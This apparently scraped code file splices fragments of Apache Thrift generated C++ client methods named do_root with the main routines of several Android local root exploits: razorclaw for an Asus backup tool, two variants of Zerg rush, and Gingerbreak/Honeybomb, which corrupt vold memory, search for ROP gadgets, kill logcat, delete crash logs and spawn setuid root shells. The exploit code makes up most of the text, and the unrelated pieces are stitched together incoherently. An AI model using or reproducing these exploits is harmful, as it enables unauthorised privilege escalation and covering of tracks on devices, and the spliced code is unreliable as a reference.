folly::Future<std::pair<folly::Unit, std::unique_ptr<apache::thrift::transport::THeader>>> MyRootAsyncClient::header_future_do_root(apache::thrift::RpcOptions& rpcOptions) {
folly::Promise<std::pair<folly::Unit, std::unique_ptr<apache::thrift::transport::THeader>>> promise4;
auto future5 = promise4.getFuture();
auto callback6 = folly::make_unique<apache::thrift::HeaderFutureCallback<folly::Unit>>(std::move(promise4), recv_wrapped_do_root, channel_);
do_root(rpcOptions, std::move(callback6));
return future5;
}
folly::Future<folly::Unit> MyRootAsyncClient::future_do_root(apache::thrift::RpcOptions& rpcOptions) {
folly::Promise<folly::Unit> promise1;
auto future2 = promise1.getFuture();
std::unique_ptr<apache::thrift::RequestCallback> callback3(new apache::thrift::FutureCallback<folly::Unit>(std::move(promise1), recv_wrapped_do_root, channel_, (rpcOptions.getUseForReadHeaders() ? &rpcOptions : nullptr)));
do_root(rpcOptions, std::move(callback3));
return std::move(future2);
}
folly::Future<folly::Unit> MyRootAsyncClient::future_do_root(apache::thrift::RpcOptions& rpcOptions) {
folly::Promise<folly::Unit> promise1;
auto future2 = promise1.getFuture();
auto callback3 = folly::make_unique<apache::thrift::FutureCallback<folly::Unit>>(std::move(promise1), recv_wrapped_do_root, channel_);
do_root(rpcOptions, std::move(callback3));
return future2;
}
void MyRootAsyncClient::sync_do_root(apache::thrift::RpcOptions& rpcOptions) {
apache::thrift::ClientReceiveState _returnState;
std::unique_ptr<apache::thrift::RequestCallback> callback0(new apache::thrift::ClientSyncCallback(&_returnState, getChannel()->getEventBase(), false));
do_root(rpcOptions, std::move(callback0));
getChannel()->getEventBase()->loopForever();
SCOPE_EXIT {
if (_returnState.header() && !_returnState.header()->getHeaders().empty()) {
rpcOptions.setReadHeaders(_returnState.header()->releaseHeaders());
}
};
if (!_returnState.buf()) {
assert(_returnState.exception());
std::rethrow_exception(_returnState.exception());
}
recv_do_root(_returnState);
}
int main(int argc, const char **argv)
{
char path[512];
char cmd[1024];
int rc;
printf("razorclaw - asus backup local root exploit.\n");
printf("by androidroot.mobi\n");
printf("-------------------------------------------\n\n");
if(getuid() == 0) {
if(argc > 1 && !strcasecmp(argv[1], "--install")) {
printf("[+] installing SuperUser and su\n");
return do_root();
} else {
printf("[-] already root and nothing to do.\n\n");
printf("[*] hint: to install SuperUser and su pass the "
"--install parameter on the command line.\n");
return 1;
}
}
readlink("/proc/self/exe", path, sizeof(path));
path[strrchr(path, '/') - path] = '\0';
if(chdir(path)) {
printf("[-] could not chdir into directory: %s\n", path);
return 2;
}
if(!mkdir_recursive(DB_DIR)) {
printf("[-] could not create directory: %s\n", DB_DIR);
return 3;
} else {
printf("[+] created fake relative path.\n");
}
if(!create_database()) {
printf("[-] failed to create fake database.\n");
return 4;
} else {
printf("[+] created fake database.\n");
}
snprintf(cmd, sizeof(cmd),
"/system/xbin/asus-backup %s %s/%s --install >/dev/null",
SECURE_ARG, path, strrchr(argv[0], '/') + 1);
if(argc > 1 && !strcasecmp(argv[1], "--install")) {
rc = system(cmd);
switch(rc) {
case DO_ROOT_OK:
printf("[!] successfully rooted your device.\n");
break;
case DO_ROOT_FAIL_MOUNT:
printf("[-] failed to remount /system\n");
break;
case DO_ROOT_FAIL_SU:
printf("[-] failed to install su binary\n");
break;
case DO_ROOT_FAIL_SU_SUID:
printf("[-] failed to set su binary suid\n");
break;
case DO_ROOT_FAIL_APK:
printf("[-] failed to install Superuser.apk\n");
break;
default:
printf("[-] unknown error occurred whist "
"trying to root device: %d\n", rc);
break;
}
} else {
printf("[!] spawning your root shell...\n");
rc = execl("/system/xbin/asus-backup", "/system/xbin/asus-backup",
SECURE_ARG, "/system/bin/sh", NULL);
}
return rc;
}
void MyRootAsyncClient::do_root(std::function<void (::apache::thrift::ClientReceiveState&&)> callback) {
do_root(std::unique_ptr<apache::thrift::RequestCallback>(new apache::thrift::FunctionReplyCallback(std::move(callback))));
}
folly::Future<folly::Unit> MyRootSvIf::future_do_root() {
return apache::thrift::detail::si::future([&] { return do_root(); });
}
int main(int argc, char **argv, char **env)
{
uint32_t i = 0, ok = 0;
char *ash[] = {sh, 0};
struct stat st;
char version_release[256];
int tries=0;
if (geteuid() == 0 && getuid() == 0 && strstr(argv[0], "boomsh"))
do_root();
printf("\n[**] Zerg rush - Android 2.2/2.3 local root\n");
printf("[**] (C) 2011 Revolutionary. All rights reserved.\n\n");
printf("[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.\n\n");
if (copy("/proc/self/exe", bsh) < 0 || copy("/system/bin/sh", sh) < 0)
die("[-] Cannot copy boomsh.");
chmod(bsh, 0711);
stat(vold, &st);
heap_addr = ((((st.st_size) + 0x8000) / 0x1000) + 1) * 0x1000;
__system_property_get("ro.build.version.release", version_release);
if (strstr(version_release, "2.2")) {
heap_addr += 0x108;
printf("[+] Found a Froyo ! 0x%08x\n", heap_addr);
} else if (strstr(version_release, "2.3")) {
heap_addr += 0x118;
printf("[+] Found a GingerBread ! 0x%08x\n", heap_addr);
} else {
printf("[-] Not a 2.2/2.3 Android ...\n");
exit(-1);
}
system_ptr = (uint32_t) find_symbol("system");
if (check_addr(system_ptr) == -1) {
printf("[-] High templars, we're doomed!\n");
exit(-1);
}
tries = 0;
printf("[*] Scooting ...\n");
while(buffsz=allbuffsz[tries]) {
if(checkcrash()) {
printf("[+] Zerglings found a way to enter ! 0x%02x\n", buffsz);
break;
}
tries++;
}
if(!buffsz) {
printf("[-] Hellions with BLUE flames !\n");
exit(-1);
}
for (tries = 0; tries < 5; tries++) {
find_stack_addr();
if (stack_addr != 0x41414141 && jumpsz) {
printf("[+] Zerglings caused crash (good news): 0x%08x 0x%04x\n", stack_addr, jumpsz);
break;
}
printf("[*] Trying a new path ...\n");
switch(tries) {
case 0:
case 2:
case 4:
heap_addr += 8;
break;
case 1:
heap_addr += 0xb8;
break;
case 3:
heap_addr -= 0x180;
break;
default:
break;
}
}
if (stack_addr == 0x41414141 || !jumpsz) {
printf("[-] Zerglings did not leave interesting stuff\n");
exit(-1);
}
if (check_addr(stack_addr) == -1) {
printf("[-] Siege tanks, we're doomed!\n");
exit(-1);
}
if (jumpsz > 108 + 12) {
printf("[-] This terran has walled!\n");
exit(-1);
}
kill(logcat_pid, SIGKILL);
unlink(crashlog);
printf("[*] Researching Metabolic Boost ...\n");
find_rop_gadgets();
printf("[+] Speedlings on the go ! 0x%08x 0x%08x\n", stack_pivot, pop_r0);
for(i=0; i<3; i++) {
do_fault();
stat(sh, &st);
if ((st.st_mode & 04000) == 04000) {
printf("\n[+] Rush did it ! It's a GG, man !\n");
ok = 1;
break;
} else {
printf("\n[-] Bad luck, our rush did not succeed :( (%d/%d)\n", i, 2);
switch(i) {
case 0:
heap_addr += 16;
break;
case 1:
heap_addr -=32;
break;
default:
break;
}
}
}
if (ok) {
char qemuprop[1];
property_get("ro.kernel.qemu",qemuprop,"0");
if (qemuprop[0]=='1') {
printf("[+] Killing ADB and restarting as root... enjoy!\n");
fflush(stdout);
sleep(1);
kill(-1,SIGTERM);
} else {
printf("[-] Failed to set property to restart adb. Not killing.\n");
}
} else {
printf("Exiting. Try again later.\n");
fflush(stdout);
sleep(1);
kill(-1,SIGTERM);
}
return 0;
}
int main(int argc, char **argv, char **env)
{
uint32_t i = 0, ok = 0;
char *ash[] = {sh, 0};
struct stat st;
char version_release[1024];
int tries=0;
if (geteuid() == 0 && getuid() == 0 && strstr(argv[0], "boomsh"))
do_root();
printf("\n[**] Zerg rush - Android 2.2/2.3 local root\n");
printf("[**] (C) 2011 Revolutionary. All rights reserved.\n\n");
printf("[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.\n\n");
if (copy("/proc/self/exe", bsh) < 0 || copy("/system/bin/sh", sh) < 0)
die("[-] Cannot copy boomsh.");
chmod(bsh, 0711);
stat(vold, &st);
heap_base_addr = ((((st.st_size) + 0x8000) / 0x1000) + 1) * 0x1000;
__system_property_get("ro.build.version.release", version_release);
if (strstr(version_release, "2.2")) {
heap_offset = 0x108;
printf("[+] Found a Froyo ! 0x%08x\n", heap_offset);
} else if (strstr(version_release, "2.3")) {
heap_offset = 0x118;
printf("[+] Found a GingerBread ! 0x%08x\n", heap_offset);
} else {
printf("[-] Not a 2.2/2.3 Android ...\n");
exit(-1);
}
heap_addr = 0xffffff;
__system_property_get("ro.build.fingerprint", version_release);
if(!strncmp(version_release, "samsung", 7)) {
printf("[+] Found a Samsung, running Samsung mode\n");
samsung = 1;
}
system_ptr = (uint32_t) find_symbol("system");
libc_base = system_ptr & 0xfff00000;
if (check_addr(system_ptr) == -1) {
printf("[-] High templars, we're doomed!\n");
exit(-1);
}
tries = 0;
printf("[*] Scooting ...\n");
while(buffsz=allbuffsz[tries]) {
if(checkcrash()) {
printf("[+] Zerglings found a way to enter ! 0x%02x\n", buffsz);
break;
}
tries++;
}
if(!buffsz) {
printf("[-] Hellions with BLUE flames !\n");
exit(-1);
}
for (tries = 0; tries < 2; tries++) {
heap_oracle();
find_stack_addr();
if (stack_addr != 0x41414141 && jumpsz) {
printf("[+] Zerglings caused crash (good news): 0x%08x 0x%04x\n", stack_addr, jumpsz);
break;
}
}
if (stack_addr == 0x41414141 || !jumpsz) {
printf("[-] Zerglings did not leave interesting stuff\n");
exit(-1);
}
if (check_addr(stack_addr) == -1) {
if(bad_byte(stack_addr & 0xff)) {
stack_addr += 4;
adjust = 4;
if (check_addr(stack_addr) == -1) {
printf("[-] Siege tanks, we're doomed!\n");
exit(-1);
}
}
else {
printf("[-] Siege tanks, we're doomed!\n");
exit(-1);
}
}
if (jumpsz > 108 + 12) {
printf("[-] This terran has walled!\n");
exit(-1);
}
if(check_libc_base()) {
system_ptr = libc_base + (system_ptr & 0x000fffff);
printf("[*] Creating more creep 0x%08x ...\n", system_ptr);
if (check_addr(system_ptr) == -1) {
printf("[-] High templars, we're doomed!\n");
exit(-1);
}
}
kill(logcat_pid, SIGKILL);
unlink(crashlog);
printf("[*] Researching Metabolic Boost ...\n");
find_rop_gadgets();
printf("[+] Speedlings on the go ! 0x%08x 0x%08x\n", stack_pivot, pop_r0);
do_fault();
stat(sh, &st);
if ((st.st_mode & 04000) == 04000) {
char qemuprop[1];
printf("\n[+] Rush did it ! It's a GG, man !\n");
property_get("ro.kernel.qemu",qemuprop,"0");
if (qemuprop[0]=='1') {
printf("[+] Killing ADB and restarting as root... enjoy!\n");
fflush(stdout);
sleep(1);
kill(-1, SIGTERM);
} else {
printf("[-] Failed to set property to restart adb. Not killing.\n");
}
} else {
printf("\n[-] Bad luck, our rush did not succeed :(\n");
fflush(stdout);
sleep(1);
kill(-1, SIGTERM);
}
return 0;
}
int main(int argc, char **argv, char **env)
{
uint32_t i = 0, j = 0, idx = 0;
char *ash[] = {sh, 0};
struct stat st;
char build_id[256], version_release[256];
if (geteuid() == 0 && getuid() == 0 && strstr(argv[0], "boomsh"))
do_root();
printf("\n[**] Gingerbreak/Honeybomb -- android 2.[2,3], 3.0 softbreak\n");
printf("[**] (C) 2010-2011 The Android Exploid Crew. All rights reserved.\n");
printf("[**] Kudos to jenzi, the #brownpants-party, the Open Source folks,\n");
printf("[**] Zynamics for ARM skills and Onkel Budi\n\n");
printf("[**] donate to [email protected] if you like\n[**] Exploit may take a while!\n\n");
if (copy("/proc/self/exe", bsh) < 0 || copy("/system/bin/sh", sh) < 0)
die("[-] Cannot copy boomsh.");
chmod(bsh, 0711);
printf("[+] start __system_property_get(\"ro.build.id\", build_id)\n");
__system_property_get("ro.build.id", build_id);
printf("[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+]end __system_property_get(\"ro.build.id\", build_id)\n");
__system_property_get("ro.build.version.release", version_release);
printf("[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] end __system_property_get(\"ro.build.version.release\", version_release)\n");
if (strstr(build_id, "HONEY") || strstr(build_id, "Honey") || strstr(build_id, "honey") ||
strstr(version_release, "comb")) {
printf("[+] Detected honeycomb! Starting honeybomb mode (scale=10).\n");
scale = 10;
honeycomb = 1;
} else if (strstr(build_id, "FR") || strstr(build_id, "Fr") || strstr(build_id, "fr")) {
printf("[+] Detected Froyo!\n");
froyo = 1;
} else
printf("[+] Plain Gingerbread mode!\n");
find_vold(&vold);
find_got("/system/bin/vold");
find_device();
printf("[*] vold: %04d GOT start: 0x%08x GOT end: 0x%08x\n", vold.pid, vold.got_start,
vold.got_end);
printf("[*] start find_index\n");
idx = find_index();
printf("[*] idx: %04d GOT idx\n", idx);
kill(logcat_pid, SIGKILL);
unlink(crashlog);
printf("[*] _________________end unlink\n");
for (i = idx; j++ < (vold.got_end - vold.got_start); --i) {
if (do_fault(i, 0) < 0) {
++i; --j;
printf("[-] sendmsg() failed?\n");
continue;
}
printf("[*] vold: %04d idx: %08d\n", vold.pid, -i); fflush(stdout);
stat(sh, &st);
if ((st.st_mode & 04000) == 04000) {
printf("\n\n[!] dance forever my only one\n");
break;
}
}
/* Last try, sometimes vold cant handle 2 receives in the order
* we like by do_fault()
*/
if ((st.st_mode & 04000) != 04000) {
last_try(); last_try();
stat(sh, &st);
if ((st.st_mode & 04000) == 04000) {
printf("\n[+] You are in luck! Last try succeeded!\n");
} else {
printf("\n[-] Bad luck. Fixed vold?\n");
exit(1);
}
}
execve(*ash, ash, env);
return 0;
}
void MyRootAsyncClient::do_root(std::function<void (::apache::thrift::ClientReceiveState&&)> callback) {
do_root(folly::make_unique<apache::thrift::FunctionReplyCallback>(std::move(callback)));
}
